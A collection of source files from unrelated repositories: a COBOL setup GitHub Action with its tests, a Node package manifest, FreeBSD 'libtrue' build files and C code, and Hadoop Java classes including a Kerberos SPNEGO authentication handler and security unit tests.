"issuehunt",
"liberapay",
"markdownlint",
"vercel"
],
"editor.rulers": [ 80 ]
}
<|start_filename|>__tests__/test-installer.js<|end_filename|>
const exec = require('@actions/exec');
const fs = require('fs');
const os = require('os');
const path = require('path');
const { assert } = require('chai');
const itParam = require('mocha-param');
const sinon = require('sinon');
const {
Installer,
UnsupportedOSError,
UnsupportedVersionError
} = require('../src/installer');
const fixture = ['Darwin', 'Windows_NT'];
const validVersion = '3.0-rc1';
const invalidVersion = 'y50pgz2b';
describe('Test Installer class', () => {
let fsChmodSyncStub;
let execExecStub;
let osTypeStub;
beforeEach(() => {
fsChmodSyncStub = sinon.stub(fs, 'chmodSync');
execExecStub = sinon.stub(exec, 'exec');
osTypeStub = sinon.stub(os, 'type');
});
it('should build correct exec file name for Linux OS', () => {
osTypeStub.returns('Linux');
const installer = new Installer(validVersion);
const expected = 'install-cobol-linux.sh';
const actual = installer._execFileName();
assert.equal(expected, actual);
});
itParam('should not build exec file name for ${value} OS', fixture,
(osType) => {
osTypeStub.returns(osType);
const installer = new Installer(validVersion);
try {
installer._execFileName();
} catch (e) {
if (e instanceof UnsupportedOSError) {
return;
}
}
assert.fail('expected UnsupportedOSError to be thrown');
});
it('should install correctly for Linux OS', async () => {
const version = validVersion;
const execFileName = 'install-cobol-linux.sh';
osTypeStub.returns('Linux');
const installer = new Installer(version);
await installer.install();
execExecStub.calledOnceWith(
path.join(__dirname, execFileName),
[version]
);
fsChmodSyncStub.calledOnceWith(path.join(__dirname, execFileName), '777');
});
itParam('should not install for ${value} OS', fixture, async (osType) => {
osTypeStub.returns(osType);
const installer = new Installer(validVersion);
try {
await installer.install();
} catch (e) {
if (e instanceof UnsupportedOSError) {
assert.isTrue(execExecStub.notCalled);
assert.isTrue(fsChmodSyncStub.notCalled);
return;
}
}
assert.fail('expected UnsupportedOSError to be thrown');
});
it('should not install invalid version', async () => {
osTypeStub.returns('Linux');
const installer = new Installer(invalidVersion);
try {
await installer.install();
} catch (e) {
if (e instanceof UnsupportedVersionError) {
assert.isTrue(execExecStub.notCalled);
assert.isTrue(fsChmodSyncStub.notCalled);
return;
}
}
assert.fail('expected UnsupportedVersionError to be thrown');
});
afterEach(() => {
sinon.restore();
});
});
<|start_filename|>src/installer.js<|end_filename|>
const exec = require('@actions/exec');
const fs = require('fs');
const Logger = require('./logger');
const os = require('os');
const path = require('path');
class UnsupportedOSError extends Error {
constructor(message) {
super(message);
}
}
class UnsupportedVersionError extends Error {
constructor(message) {
super(message);
}
}
class Installer {
constructor(version, baseDir = __dirname) {
this.version = version;
this.baseDir = baseDir;
this.logger = new Logger('Installer');
this.SUPPORTED_VERSIONS = ['3.0-rc1'];
this.EXEC_FILE_NAME = 'install-cobol-linux.sh';
}
_execFileName() {
const osType = os.type();
if (osType === 'Linux') {
return this.EXEC_FILE_NAME;
}
throw new UnsupportedOSError(
// eslint-disable-next-line max-len
`${osType} is not supported. fabasoad/setup-cobol-action only supports Ubuntu Linux at this time.`
);
}
async install() {
if (!this.SUPPORTED_VERSIONS.includes(this.version)) {
throw new UnsupportedVersionError(
`Version ${this.version} is not supported.`
);
}
const execFileName = path.join(this.baseDir, this._execFileName());
this.logger.info(`Changing permissions to 777 for ${execFileName}...`);
fs.chmodSync(execFileName, '777');
this.logger.info(`Running ${execFileName}...`);
await exec.exec(execFileName, [this.version]);
this.logger.info('Installation successfully finished.');
}
}
module.exports = { Installer, UnsupportedOSError, UnsupportedVersionError };
<|start_filename|>src/logger.js<|end_filename|>
const { createLogger, format, transports } = require('winston');
const { combine, timestamp, label, printf } = format;
class Logger {
constructor(clazz) {
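// Note: the constructor returns a configured winston logger (labelled with the class name), so new Logger(...) yields that winston instance rather than a Logger object.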
const customFormat = printf(({ level, message, label, timestamp }) => {
timestamp = timestamp.replace(/T/, ' ').replace(/\..+/, '');
return `${timestamp} [${label}] ${level}: ${message}`;
});
return createLogger({
level: 'debug',
format: combine(
label({ label: clazz }),
timestamp(),
customFormat
),
transports: [
new transports.Console()
]
});
}
}
module.exports = Logger;
| fabasoad/setup-cobol-action |
<|start_filename|>src/package.json<|end_filename|>
{
"name": "web-status-monitor",
"version": "1.1.0",
"description": "Ping websites at regular intervals using just GitHub Actions!",
"scripts": {
"start": "ts-node index.ts"
},
"repository": {
"type": "git",
"url": "git+https://github.com/zyrouge/web-status-monitor.git"
},
"keywords": [],
"author": "ZYROUGE",
"license": "MIT",
"bugs": {
"url": "https://github.com/zyrouge/web-status-monitor/issues"
},
"homepage": "https://github.com/zyrouge/web-status-monitor#readme",
"dependencies": {
"@types/fs-extra": "^9.0.7",
"axios": "^0.21.1",
"chalk": "^4.1.0",
"fs-extra": "^9.1.0",
"ts-node": "^9.1.1",
"typescript": "^4.1.5",
"yaml": "^1.10.0"
}
}
| Snzy027/web-status-monitor |
<|start_filename|>libtrue/Makefile<|end_filename|>
# $FreeBSD$
LIB= true
SHLIB_MAJOR= 0
SRCS= true.c
MAN=
.include <bsd.lib.mk>
<|start_filename|>true/Makefile<|end_filename|>
# $FreeBSD$
PROG= true
CFLAGS= -I${.CURDIR:H}/libtrue
LDADD= -L../libtrue -ltrue
OS!= uname
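# Link against libxo only when building on FreeBSD and the shared library is available.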
.if ${OS} == "FreeBSD" && exists(/usr/lib/libxo.so)
LDADD+= -lxo
.endif
MAN=
.include <bsd.prog.mk>
<|start_filename|>true/true.c<|end_filename|>
/*-
* Copyright (c) 2017 <NAME>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#ifdef __FreeBSD__
#include <osreldate.h>	/* userland definition of __FreeBSD_version */
#endif
#if defined(__FreeBSD__) && (__FreeBSD_version > 1200012)
#define WITH_CAPSICUM
#define WITH_XO
#endif
#if defined(__FreeBSD__) && (__FreeBSD_version > 1100041)
#define WITH_LIBXO
#endif
#include <sys/cdefs.h>
#ifdef WITH_CAPSICUM
#include <sys/capsicum.h>
#include <capsicum_helpers.h>
#endif
#include <err.h>
#include <errno.h>
#ifdef WITH_LIBXO
#include <libxo/xo.h>
#include <locale.h>
#endif
#include <stdbool.h>
#include <true.h>
int
main(int argc, char *argv[])
{
int value;
#ifdef WITH_CAPSICUM
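/* Restrict the std{in,out,err} descriptors and enter Capsicum capability mode. */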
if (caph_limit_stdio() != 0)
errx(1, "Failed to limit std{in,out,err}");
if (cap_enter() != 0 && errno != ENOSYS)
errx(1, "Failed to enter capability mode");
#endif
value = get_true();
#ifdef WITH_XO
(void) setlocale(LC_CTYPE, "");
argc = xo_parse_args(argc, argv);
if (argc < 0)
return (argc);
#endif
#ifdef WITH_XO
xo_open_container("true");
#endif
if (!value) {
#ifdef WITH_XO
xo_errx(1, "Bad true value: %u", value);
#else
errx(1, "Bad true value");
#endif
}
#ifdef WITH_XO
xo_emit("{n:value/%s}\n", value ? "true" : "false");
xo_close_container("true");
xo_finish();
#endif
return (0);
}
| sbz/libtrue |
<|start_filename|>src/mapred/org/apache/hadoop/mapred/JobSubmitInfo.java<|end_filename|>
package org.apache.hadoop.mapred;
import java.io.ByteArrayOutputStream;
import java.io.DataInput;
import java.io.DataOutput;
import java.io.DataOutputStream;
import java.io.IOException;
import org.apache.hadoop.io.Writable;
import org.apache.hadoop.io.WritableFactories;
public class JobSubmitInfo implements Writable {
private boolean useNewAPI;
private SplitInfo[] splitInfos;
private JobConf jobConf;
public JobSubmitInfo(JobConf conf,
org.apache.hadoop.mapred.InputSplit splits[]) throws IOException {
this.jobConf = conf;
this.useNewAPI = false;
setSplitInfos(new SplitInfo[splits.length]);
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
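// Serialize each split as (class name, raw bytes, length, locations) so it can be shipped and reconstructed later.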
for (int i = 0; i < splits.length; ++i) {
DataOutputStream dataOutputStream = new DataOutputStream(outputStream);
String className = splits[i].getClass().getName();
splits[i].write(dataOutputStream);
dataOutputStream.flush();
byte[] object = outputStream.toByteArray();
outputStream.reset();
getSplitInfos()[i] = new SplitInfo(className, object, splits[i]
.getLength(), splits[i].getLocations());
}
}
public JobSubmitInfo(JobConf conf,
org.apache.hadoop.mapreduce.InputSplit splits[]) throws IOException,
InterruptedException {
this.jobConf = conf;
this.useNewAPI = true;
setSplitInfos(new SplitInfo[splits.length]);
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
for (int i = 0; i < splits.length; ++i) {
DataOutputStream dataOutputStream = new DataOutputStream(outputStream);
String className = splits[i].getClass().getName();
((Writable) splits[i]).write(dataOutputStream);
dataOutputStream.flush();
byte[] object = outputStream.toByteArray();
outputStream.reset();
getSplitInfos()[i] = new SplitInfo(className, object, splits[i]
.getLength(), splits[i].getLocations());
}
}
public JobSubmitInfo() {
}
public int getSplitNum() {
return getSplitInfos().length;
}
public TaskSplitInfo[] getTaskSplitInfos() {
TaskSplitInfo[] result = new TaskSplitInfo[splitInfos.length];
for(int i = 0; i < result.length; ++i)
result[i] = new TaskSplitInfo(jobConf, splitInfos[i]);
return result;
}
@Override
public void readFields(DataInput in) throws IOException {
jobConf = new JobConf(false);
jobConf.readFields(in);
useNewAPI = in.readBoolean();
int splitNum = in.readInt();
setSplitInfos(new SplitInfo[splitNum]);
for (int i = 0; i < splitNum; ++i) {
getSplitInfos()[i] = new SplitInfo();
getSplitInfos()[i].readFields(in);
}
}
@Override
public void write(DataOutput out) throws IOException {
jobConf.write(out);
out.writeBoolean(useNewAPI);
out.writeInt(getSplitNum());
for (SplitInfo info : getSplitInfos())
info.write(out);
}
public void setUseNewAPI(boolean useNewAPI) {
this.useNewAPI = useNewAPI;
}
public boolean isUseNewAPI() {
return useNewAPI;
}
public void setJobConf(JobConf jobConf) {
this.jobConf = jobConf;
}
public JobConf getJobConf() {
return jobConf;
}
public void setSplitInfos(SplitInfo[] splitInfos) {
this.splitInfos = splitInfos;
}
public SplitInfo[] getSplitInfos() {
return splitInfos;
}
}
<|start_filename|>src/test/org/apache/hadoop/mapred/TestReduceTaskFetchFail.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import static org.junit.Assert.*;
import java.io.IOException;
import org.apache.hadoop.mapred.Task.TaskReporter;
import org.apache.hadoop.mapred.TaskUmbilicalProtocol;
import org.apache.hadoop.mapred.JobConf;
import org.apache.hadoop.mapred.ReduceTask;
import org.junit.Test;
import static org.mockito.Mockito.*;
public class TestReduceTaskFetchFail {
public static class TestReduceTask extends ReduceTask {
public TestReduceTask() {
super();
}
public String getJobFile() { return "/foo"; }
//
// public class TestReduceCopier extends ReduceCopier {
// public TestReduceCopier(TaskUmbilicalProtocol umbilical, JobConf conf,
// TaskReporter reporter
// )throws ClassNotFoundException, IOException {
// super(umbilical, conf, reporter);
// }
//
// public void checkAndInformJobTracker(int failures, TaskAttemptID mapId, boolean readError) {
// super.checkAndInformJobTracker(failures, mapId, readError);
// }
//
// }
//
// }
//
//
// @SuppressWarnings("deprecation")
// @Test
// public void testcheckAndInformJobTracker() throws Exception {
// //mock creation
// TaskUmbilicalProtocol mockUmbilical = mock(TaskUmbilicalProtocol.class);
// TaskReporter mockTaskReporter = mock(TaskReporter.class);
//
// JobConf conf = new JobConf();
// conf.setUser("testuser");
// conf.setJobName("testJob");
// conf.setSessionId("testSession");
//
// TaskAttemptID tid = new TaskAttemptID();
// TestReduceTask rTask = new TestReduceTask();
// rTask.setConf(conf);
//
// ReduceTask.ReduceCopier reduceCopier = rTask.new TestReduceCopier(mockUmbilical, conf, mockTaskReporter);
// reduceCopier.checkAndInformJobTracker(1, tid, false);
//
// verify(mockTaskReporter, never()).progress();
//
// reduceCopier.checkAndInformJobTracker(10, tid, false);
// verify(mockTaskReporter, times(1)).progress();
//
// // Test the config setting
// conf.setInt("mapreduce.reduce.shuffle.maxfetchfailures", 3);
//
// rTask.setConf(conf);
// reduceCopier = rTask.new TestReduceCopier(mockUmbilical, conf, mockTaskReporter);
//
// reduceCopier.checkAndInformJobTracker(1, tid, false);
// verify(mockTaskReporter, times(1)).progress();
//
// reduceCopier.checkAndInformJobTracker(3, tid, false);
// verify(mockTaskReporter, times(2)).progress();
//
// reduceCopier.checkAndInformJobTracker(5, tid, false);
// verify(mockTaskReporter, times(2)).progress();
//
// reduceCopier.checkAndInformJobTracker(6, tid, false);
// verify(mockTaskReporter, times(3)).progress();
//
// // test readError and its config
// reduceCopier.checkAndInformJobTracker(7, tid, true);
// verify(mockTaskReporter, times(4)).progress();
//
// conf.setBoolean("mapreduce.reduce.shuffle.notify.readerror", false);
//
// rTask.setConf(conf);
// reduceCopier = rTask.new TestReduceCopier(mockUmbilical, conf, mockTaskReporter);
//
// reduceCopier.checkAndInformJobTracker(7, tid, true);
// verify(mockTaskReporter, times(4)).progress();
//
}
}
<|start_filename|>src/core/org/apache/hadoop/security/authentication/server/KerberosAuthenticationHandler.java<|end_filename|>
/**
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License. See accompanying LICENSE file.
*/
package org.apache.hadoop.security.authentication.server;
import org.apache.hadoop.security.authentication.client.AuthenticationException;
import org.apache.hadoop.security.authentication.client.KerberosAuthenticator;
import com.sun.security.auth.module.Krb5LoginModule;
import org.apache.commons.codec.binary.Base64;
import org.apache.hadoop.security.KerberosName;
import org.ietf.jgss.GSSContext;
import org.ietf.jgss.GSSCredential;
import org.ietf.jgss.GSSManager;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import javax.security.auth.Subject;
import javax.security.auth.kerberos.KerberosPrincipal;
import javax.security.auth.login.AppConfigurationEntry;
import javax.security.auth.login.Configuration;
import javax.security.auth.login.LoginContext;
import javax.security.auth.login.LoginException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.File;
import java.io.IOException;
import java.security.Principal;
import java.security.PrivilegedActionException;
import java.security.PrivilegedExceptionAction;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Properties;
import java.util.Set;
/**
* The {@link KerberosAuthenticationHandler} implements the Kerberos SPNEGO authentication mechanism for HTTP.
* <p/>
* The supported configuration properties are:
* <ul>
* <li>kerberos.principal: the Kerberos principal to be used by the server. As stated by the Kerberos SPNEGO
* specification, it should be <code>HTTP/${HOSTNAME}@{REALM}</code>. The realm can be omitted from the
* principal as the JDK GSS libraries will use the realm name of the configured default realm.
* It does not have a default value.</li>
* <li>kerberos.keytab: the keytab file containing the credentials for the Kerberos principal.
* It does not have a default value.</li>
* <li>kerberos.name.rules: kerberos names rules to resolve principal names, see
* {@link KerberosName#setRules(String)}</li>
* </ul>
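* <p/>
* For illustration only, the handler might be initialized with properties along these
* lines (the principal, realm and keytab path below are hypothetical):
* <pre>
* Properties props = new Properties();
* props.setProperty("kerberos.principal", "HTTP/host.example.com@EXAMPLE.COM");
* props.setProperty("kerberos.keytab", "/etc/security/keytabs/spnego.keytab");
* KerberosAuthenticationHandler handler = new KerberosAuthenticationHandler();
* handler.init(props);
* </pre>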
*/
public class KerberosAuthenticationHandler implements AuthenticationHandler {
private static Logger LOG = LoggerFactory.getLogger(KerberosAuthenticationHandler.class);
/**
* Kerberos context configuration for the JDK GSS library.
*/
private static class KerberosConfiguration extends Configuration {
private String keytab;
private String principal;
public KerberosConfiguration(String keytab, String principal) {
this.keytab = keytab;
this.principal = principal;
}
@Override
public AppConfigurationEntry[] getAppConfigurationEntry(String name) {
Map<String, String> options = new HashMap<String, String>();
options.put("keyTab", keytab);
options.put("principal", principal);
options.put("useKeyTab", "true");
options.put("storeKey", "true");
options.put("doNotPrompt", "true");
options.put("useTicketCache", "true");
options.put("renewTGT", "true");
options.put("refreshKrb5Config", "true");
options.put("isInitiator", "false");
String ticketCache = System.getenv("KRB5CCNAME");
if (ticketCache != null) {
options.put("ticketCache", ticketCache);
}
if (LOG.isDebugEnabled()) {
options.put("debug", "true");
}
return new AppConfigurationEntry[]{
new AppConfigurationEntry(Krb5LoginModule.class.getName(),
AppConfigurationEntry.LoginModuleControlFlag.REQUIRED,
options),};
}
}
/**
* Constant that identifies the authentication mechanism.
*/
public static final String TYPE = "kerberos";
/**
* Constant for the configuration property that indicates the kerberos principal.
*/
public static final String PRINCIPAL = TYPE + ".principal";
/**
* Constant for the configuration property that indicates the keytab file path.
*/
public static final String KEYTAB = TYPE + ".keytab";
/**
* Constant for the configuration property that indicates the Kerberos name
* rules for the Kerberos principals.
*/
public static final String NAME_RULES = TYPE + ".name.rules";
private String principal;
private String keytab;
private GSSManager gssManager;
private LoginContext loginContext;
/**
* Initializes the authentication handler instance.
* <p/>
* It creates a Kerberos context using the principal and keytab specified in the configuration.
* <p/>
* This method is invoked by the {@link AuthenticationFilter#init} method.
*
* @param config configuration properties to initialize the handler.
*
* @throws ServletException thrown if the handler could not be initialized.
*/
@Override
public void init(Properties config) throws ServletException {
try {
principal = config.getProperty(PRINCIPAL, principal);
if (principal == null || principal.trim().length() == 0) {
throw new ServletException("Principal not defined in configuration");
}
keytab = config.getProperty(KEYTAB, keytab);
if (keytab == null || keytab.trim().length() == 0) {
throw new ServletException("Keytab not defined in configuration");
}
if (!new File(keytab).exists()) {
throw new ServletException("Keytab does not exist: " + keytab);
}
String nameRules = config.getProperty(NAME_RULES, null);
if (nameRules != null) {
KerberosName.setRules(nameRules);
}
Set<Principal> principals = new HashSet<Principal>();
principals.add(new KerberosPrincipal(principal));
Subject subject = new Subject(false, principals, new HashSet<Object>(), new HashSet<Object>());
KerberosConfiguration kerberosConfiguration = new KerberosConfiguration(keytab, principal);
loginContext = new LoginContext("", subject, null, kerberosConfiguration);
loginContext.login();
Subject serverSubject = loginContext.getSubject();
try {
gssManager = Subject.doAs(serverSubject, new PrivilegedExceptionAction<GSSManager>() {
@Override
public GSSManager run() throws Exception {
return GSSManager.getInstance();
}
});
} catch (PrivilegedActionException ex) {
throw ex.getException();
}
LOG.info("Initialized, principal [{}] from keytab [{}]", principal, keytab);
} catch (Exception ex) {
throw new ServletException(ex);
}
}
/**
* Releases any resources initialized by the authentication handler.
* <p/>
* It destroys the Kerberos context.
*/
@Override
public void destroy() {
try {
if (loginContext != null) {
loginContext.logout();
loginContext = null;
}
} catch (LoginException ex) {
LOG.warn(ex.getMessage(), ex);
}
}
/**
* Returns the authentication type of the authentication handler, 'kerberos'.
* <p/>
*
* @return the authentication type of the authentication handler, 'kerberos'.
*/
@Override
public String getType() {
return TYPE;
}
/**
* Returns the Kerberos principal used by the authentication handler.
*
* @return the Kerberos principal used by the authentication handler.
*/
protected String getPrincipal() {
return principal;
}
/**
* Returns the keytab used by the authentication handler.
*
* @return the keytab used by the authentication handler.
*/
protected String getKeytab() {
return keytab;
}
/**
* It enforces the Kerberos SPNEGO authentication sequence, returning an {@link AuthenticationToken} only
* after the Kerberos SPNEGO sequence has completed successfully.
* <p/>
*
* @param request the HTTP client request.
* @param response the HTTP client response.
*
* @return an authentication token if the Kerberos SPNEGO sequence is complete and valid,
* <code>null</code> if it is in progress (in this case the handler handles the response to the client).
*
* @throws IOException thrown if an IO error occurred.
* @throws AuthenticationException thrown if Kerberos SPNEGO sequence failed.
*/
@Override
public AuthenticationToken authenticate(HttpServletRequest request, final HttpServletResponse response)
throws IOException, AuthenticationException {
AuthenticationToken token = null;
String authorization = request.getHeader(KerberosAuthenticator.AUTHORIZATION);
if (authorization == null || !authorization.startsWith(KerberosAuthenticator.NEGOTIATE)) {
response.setHeader(KerberosAuthenticator.WWW_AUTHENTICATE, KerberosAuthenticator.NEGOTIATE);
response.setStatus(HttpServletResponse.SC_UNAUTHORIZED);
if (authorization == null) {
LOG.trace("SPNEGO starting");
} else {
LOG.warn("'" + KerberosAuthenticator.AUTHORIZATION + "' does not start with '" +
KerberosAuthenticator.NEGOTIATE + "' : {}", authorization);
}
} else {
authorization = authorization.substring(KerberosAuthenticator.NEGOTIATE.length()).trim();
final Base64 base64 = new Base64(0);
final byte[] clientToken = base64.decode(authorization);
Subject serverSubject = loginContext.getSubject();
try {
token = Subject.doAs(serverSubject, new PrivilegedExceptionAction<AuthenticationToken>() {
@Override
public AuthenticationToken run() throws Exception {
AuthenticationToken token = null;
GSSContext gssContext = null;
try {
gssContext = gssManager.createContext((GSSCredential) null);
byte[] serverToken = gssContext.acceptSecContext(clientToken, 0, clientToken.length);
if (serverToken != null && serverToken.length > 0) {
String authenticate = base64.encodeToString(serverToken);
response.setHeader(KerberosAuthenticator.WWW_AUTHENTICATE,
KerberosAuthenticator.NEGOTIATE + " " + authenticate);
}
if (!gssContext.isEstablished()) {
response.setStatus(HttpServletResponse.SC_UNAUTHORIZED);
LOG.trace("SPNEGO in progress");
} else {
String clientPrincipal = gssContext.getSrcName().toString();
KerberosName kerberosName = new KerberosName(clientPrincipal);
String userName = kerberosName.getShortName();
token = new AuthenticationToken(userName, clientPrincipal, TYPE);
response.setStatus(HttpServletResponse.SC_OK);
LOG.trace("SPNEGO completed for principal [{}]", clientPrincipal);
}
} finally {
if (gssContext != null) {
gssContext.dispose();
}
}
return token;
}
});
} catch (PrivilegedActionException ex) {
if (ex.getException() instanceof IOException) {
throw (IOException) ex.getException();
}
else {
throw new AuthenticationException(ex.getException());
}
}
}
return token;
}
}
<|start_filename|>src/mapred/org/apache/hadoop/mapred/TaskSplitInfo.java<|end_filename|>
package org.apache.hadoop.mapred;
import java.io.ByteArrayInputStream;
import java.io.DataInput;
import java.io.DataInputStream;
import java.io.DataOutput;
import java.io.IOException;
import org.apache.hadoop.conf.Configurable;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.io.Writable;
import org.apache.hadoop.mapreduce.InputSplit;
import org.apache.hadoop.util.ReflectionUtils;
public class TaskSplitInfo implements Writable, Configurable {
private String inputSplitClass;
private byte[] inputSplitObject;
private Configuration conf;
public TaskSplitInfo(JobConf conf, SplitInfo splitInfo) {
this.conf = conf;
this.setInputSplitClass(splitInfo.getInputSplitClass());
this.setInputSplitObject(splitInfo.getInputSplitObject());
}
public TaskSplitInfo(JobConf conf, String inputSplitClass,
byte[] inputSplitObject) {
this.conf = conf;
this.setInputSplitClass(inputSplitClass);
this.setInputSplitObject(inputSplitObject);
}
public TaskSplitInfo() {
}
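// Reconstruct the original old-API InputSplit: instantiate the recorded class reflectively and deserialize its bytes.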
public org.apache.hadoop.mapred.InputSplit getOldSplit() throws ClassNotFoundException, IOException {
org.apache.hadoop.mapred.InputSplit split = (org.apache.hadoop.mapred.InputSplit)ReflectionUtils.newInstance(conf.getClassByName(inputSplitClass), conf);
ByteArrayInputStream input = new ByteArrayInputStream(inputSplitObject);
DataInputStream in = new DataInputStream(input);
split.readFields(in);
return split;
}
public org.apache.hadoop.mapreduce.InputSplit getNewSplit() throws IOException, ClassNotFoundException {
org.apache.hadoop.mapreduce.InputSplit split = (org.apache.hadoop.mapreduce.InputSplit)ReflectionUtils.newInstance(conf.getClassByName(inputSplitClass), conf);
ByteArrayInputStream input = new ByteArrayInputStream(inputSplitObject);
DataInputStream in = new DataInputStream(input);
((Writable)split).readFields(in);
return split;
}
@Override
public void readFields(DataInput in) throws IOException {
setInputSplitClass(in.readUTF());
int len = in.readInt();
setInputSplitObject(new byte[len]);
in.readFully(getInputSplitObject());
}
@Override
public void write(DataOutput out) throws IOException {
out.writeUTF(inputSplitClass);
out.writeInt(inputSplitObject.length);
out.write(inputSplitObject);
}
@Override
public Configuration getConf() {
return conf;
}
@Override
public void setConf(Configuration conf) {
this.conf = conf;
}
public void setInputSplitClass(String inputSplitClass) {
this.inputSplitClass = inputSplitClass;
}
public String getInputSplitClass() {
return inputSplitClass;
}
public void setInputSplitObject(byte[] inputSplitObject) {
this.inputSplitObject = inputSplitObject;
}
public byte[] getInputSplitObject() {
return inputSplitObject;
}
}
<|start_filename|>src/test/org/apache/hadoop/security/TestSecurityUtil.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with this
* work for additional information regarding copyright ownership. The ASF
* licenses this file to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package org.apache.hadoop.security;
import static org.junit.Assert.*;
import java.io.IOException;
import java.net.InetAddress;
import org.junit.Test;
import org.mockito.Mockito;
public class TestSecurityUtil {
@Test
public void isOriginalTGTReturnsCorrectValues() {
assertTrue(SecurityUtil.isOriginalTGT("krbtgt/foo@foo"));
assertTrue(SecurityUtil.isOriginalTGT("krbtgt/foo.bar.bat@foo.bar.bat"));
assertFalse(SecurityUtil.isOriginalTGT(null));
assertFalse(SecurityUtil.isOriginalTGT("blah"));
assertFalse(SecurityUtil.isOriginalTGT(""));
assertFalse(SecurityUtil.isOriginalTGT("krbtgt/hello"));
assertFalse(SecurityUtil.isOriginalTGT("/@"));
assertFalse(SecurityUtil.isOriginalTGT("this@is/notright"));
assertFalse(SecurityUtil.isOriginalTGT("krbtgt/foo@FOO"));
}
private void verify(String original, String hostname, String expected)
throws IOException {
assertEquals(expected,
SecurityUtil.getServerPrincipal(original, hostname));
InetAddress addr = mockAddr(hostname);
assertEquals(expected,
SecurityUtil.getServerPrincipal(original, addr));
}
private InetAddress mockAddr(String reverseTo) {
InetAddress mock = Mockito.mock(InetAddress.class);
Mockito.doReturn(reverseTo).when(mock).getCanonicalHostName();
return mock;
}
@Test
public void testGetServerPrincipal() throws IOException {
String service = "hdfs/";
String realm = "@REALM";
String hostname = "foohost";
String userPrincipal = "foo@FOOREALM";
String shouldReplace = service + SecurityUtil.HOSTNAME_PATTERN + realm;
String replaced = service + hostname + realm;
verify(shouldReplace, hostname, replaced);
String shouldNotReplace = service + SecurityUtil.HOSTNAME_PATTERN + "NAME"
+ realm;
verify(shouldNotReplace, hostname, shouldNotReplace);
verify(userPrincipal, hostname, userPrincipal);
// testing reverse DNS lookup doesn't happen
InetAddress notUsed = Mockito.mock(InetAddress.class);
assertEquals(shouldNotReplace, SecurityUtil.getServerPrincipal(
shouldNotReplace, notUsed));
Mockito.verify(notUsed, Mockito.never()).getCanonicalHostName();
}
@Test
public void testLocalHostNameForNullOrWild() throws Exception {
String local = SecurityUtil.getLocalHostName();
assertEquals("hdfs/" + local + "@REALM", SecurityUtil.getServerPrincipal(
"hdfs/_HOST@REALM", (String) null));
assertEquals("hdfs/" + local + "@REALM", SecurityUtil.getServerPrincipal(
"hdfs/_HOST@REALM", "0.0.0.0"));
}
}
<|start_filename|>src/test/org/apache/hadoop/mapred/TestTaskTrackerDirectories.java<|end_filename|>
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.mapred;
import static org.junit.Assert.*;
import java.io.File;
import java.io.IOException;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FileStatus;
import org.apache.hadoop.fs.FileSystem;
import org.apache.hadoop.fs.FileUtil;
import org.apache.hadoop.fs.LocalDirAllocator;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.RawLocalFileSystem;
